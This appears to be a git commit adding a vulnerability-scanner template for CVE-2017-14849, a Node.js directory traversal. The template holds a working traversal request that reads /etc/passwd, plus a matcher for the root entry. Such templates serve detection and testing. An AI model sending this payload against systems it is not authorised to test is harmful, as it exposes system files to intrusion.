Create CVE-2017-14849.yaml

patch-1
Robbie 2020-08-19 16:34:31 +01:00 committed by GitHub
parent 54b4f92f56
commit 394d2e37cf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

20
cves/CVE-2017-14849.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2017-14849
info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body